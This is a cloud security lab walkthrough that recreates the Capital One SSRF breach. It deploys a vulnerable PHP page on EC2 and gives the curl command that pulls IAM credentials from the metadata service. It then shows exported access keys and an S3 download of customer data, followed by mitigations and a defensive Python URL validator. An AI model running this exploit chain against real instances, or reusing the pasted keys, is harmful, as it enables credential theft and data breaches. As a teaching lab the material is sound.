This lab demonstrates an attack based on the SSRF (Server-Side Request Forgery) vulnerability, which can be used to steal AWS credentials from an Amazon EC2 instance and further access sensitive data in S3 buckets. The goal is to understand the potential impact of SSRF vulnerabilities in cloud environments and explore best practices for securing cloud infrastructure.
In this lab, we simulate a real-world scenario, the 2019 Capital One data breach, in which an attacker exploits a misconfigured web application on an EC2 instance. The vulnerable application allows the attacker to reach the EC2 metadata service, retrieve IAM credentials, and subsequently gain unauthorized access to an S3 bucket. By performing this lab, we learn how simple misconfigurations can lead to serious security breaches in cloud environments.
- An AWS user account with appropriate permissions.
- IAM user with permissions to create and manage resources.
- An EC2 instance running on AWS.
- A VPC to host the EC2 instance.
- An S3 bucket to store and access data.
- The EC2 instance must be accessible via the public internet.
- 📂 Clone the Repository: Clone the repository that contains the necessary configuration files.
  ```bash
  git clone https://github.com/jasonYuRong/2019-AWS-Data-Breach-Demo.git
  ```
- 📁 Navigate to the Directory: Change into the cloned repository directory.
  ```bash
  cd 2019-AWS-Data-Breach-Demo
  ```
- 🚀 Apply Terraform Configuration: Use Terraform to set up the EC2 instance with the required configurations. This will automatically deploy Apache HTTP server and the vulnerable `ssrf.php` file.
  ```bash
  terraform apply
  ```
  Follow the prompts to approve the infrastructure changes. Terraform will create the EC2 instance along with the necessary configurations, including deploying Apache and the `ssrf.php` script.
🌿 What is Terraform? Terraform is an open-source infrastructure as code (IaC) tool created by HashiCorp. It allows you to define and provision data center infrastructure using a high-level configuration language. Terraform can manage resources across a wide range of providers, such as AWS, Azure, and Google Cloud, making it a powerful tool for automating cloud infrastructure setup and scaling. In this lab, we use Terraform to quickly deploy the required AWS infrastructure, including EC2, VPC, S3 and IAM.
The main goal of this lab is to gain unauthorized access to the S3 bucket by exploiting the SSRF vulnerability. Specifically, you will access the EC2 metadata service, obtain temporary AWS credentials, and use those credentials to retrieve an object from the S3 bucket.
The Terraform script has already set up Apache HTTP server and deployed a vulnerable PHP file, `ssrf.php`, on your EC2 instance. This file allows an attacker to exploit SSRF to access resources that should not be reachable externally, such as the EC2 metadata service.
Make sure you have an AWS EC2 instance running with the following attributes:
- Public IP: A public IP address is assigned so it can be accessed from the internet.
- IAM Role: Configured with an IAM role (`ec2_role`) that has permissions to access S3 for the demo.
- Ensure that the HTTP server is running and accessible via the public IP of your EC2 instance.
Now you can exploit the SSRF vulnerability to get the IAM role credentials from the EC2 metadata service.
Run the following `curl` command (the URL is quoted so the shell does not treat `<`, `>` and `?` specially):
```bash
curl "http://<EC2_public_ip>/ssrf.php?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2_role"
```
- `<EC2_public_ip>`: Replace with your EC2 public IP.
- `169.254.169.254`: This is the IP address of the AWS EC2 metadata service, which is only reachable from within the instance; the SSRF flaw makes the web server fetch it on the attacker's behalf.
After running the above `curl` command, you should see the temporary credentials for the IAM role, which include an access key ID, a secret access key and a session token. These map to the following environment variables:
- `AWS_ACCESS_KEY_ID`
- `AWS_SECRET_ACCESS_KEY`
- `AWS_SESSION_TOKEN`
Next, set these credentials as environment variables to use the AWS CLI for further operations. For example:
```bash
export AWS_ACCESS_KEY_ID="ASIAZDZTCACO7BAZ7KEE"
export AWS_SECRET_ACCESS_KEY="S7z6biyOscdzDEVuLLLXa0GwHYRdN89ivkMy/4Dz"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEFYaCXV..."
```
Using the credentials set in the previous step, you can now use the AWS CLI to access the specified S3 bucket.
For example, download a file from the S3 bucket:
```bash
aws s3 cp s3://jhu-en-650-603/customer.json - | cat
```
This command downloads the `customer.json` file from the S3 bucket and displays its contents in the terminal.
At this point, we have successfully exploited an SSRF vulnerability in the EC2 instance to access the metadata service and used the retrieved credentials to access sensitive data in S3.
- 🚫 Restrict Metadata Access:
  - Use Instance Metadata Service v2 (IMDSv2) to enhance security and prevent simple HTTP requests from accessing metadata.
  - In the instance's Terraform configuration, enforce IMDSv2 by setting:
    ```hcl
    metadata_options {
      http_tokens                 = "required"
      http_put_response_hop_limit = 1
    }
    ```
- 🔑 Principle of Least Privilege:
  - The IAM role assigned to the EC2 instance should follow the principle of least privilege, granting only the S3 permissions the application actually needs (specific actions on a specific bucket) to avoid over-privileged access.
- 🛡️ Web Application Firewall (WAF):
  - Use a WAF as an additional layer against SSRF attacks. WAF rules can block requests that carry the metadata service address or other internal targets in user-controlled parameters, but they complement rather than replace fixing the application.
- 📝 Code Auditing and Input Validation:
  - Ensure proper validation of user input and never pass it directly into a server-side URL request; restrict the destinations the application is allowed to fetch.
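As an added example (not code from the lab repository), here is the destination check that a fixed version of `ssrf.php` would need to apply to its `url` parameter before fetching anything: a host allowlist as the primary control, plus a resolved-address check that refuses the IMDS endpoints and any non-public range. It is written in Python so it can be run offline; `ALLOWED_HOSTS`, the reason strings and the injectable `resolver` are assumptions for this illustration.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Constructed allowlist: the only hosts the app may fetch on a user's behalf.
ALLOWED_HOSTS = {"api.example.com", "cdn.example.com"}
# EC2 Instance Metadata Service endpoints (IPv4 and IPv6).
IMDS_ADDRESSES = {ipaddress.ip_address("169.254.169.254"),
                  ipaddress.ip_address("fd00:ec2::254")}


def resolve_all(host):
    """Resolve a hostname to every IPv4/IPv6 address it maps to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def check_url(url, resolver=resolve_all):
    """Return (allowed, reason) for a user-supplied URL the server would fetch.

    The host allowlist is the primary control; the resolved-address check is
    defence in depth against an allowlisted name that points (or is rebound)
    at the metadata service or another internal range. `resolver` is
    injectable so the check can be exercised offline.
    """
    try:
        parts = urlparse(url)
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if parts.username or parts.password:
        # http://api.example.com@169.254.169.254/ makes the IMDS the real host
        return False, "userinfo in URL"
    host = (parts.hostname or "").lower().rstrip(".")
    if host not in ALLOWED_HOSTS:
        return False, "host not in allowlist"
    try:
        addrs = resolver(host)
    except OSError:
        return False, "DNS resolution failed"
    if not addrs:
        return False, "host resolves to no address"
    for addr in addrs:
        ip = ipaddress.ip_address(addr.split("%", 1)[0])  # drop IPv6 scope id
        if ip in IMDS_ADDRESSES or not ip.is_global:
            return False, f"resolves to non-public address {ip}"
    # The caller must connect to a vetted address (pin it) rather than
    # re-resolving, or DNS rebinding can still reach an internal host.
    return True, "ok"
```

Pair this with IMDSv2 enforcement: even if a future bypass slips past the check, a plain GET relayed by the web server cannot obtain the session token that IMDSv2 requires.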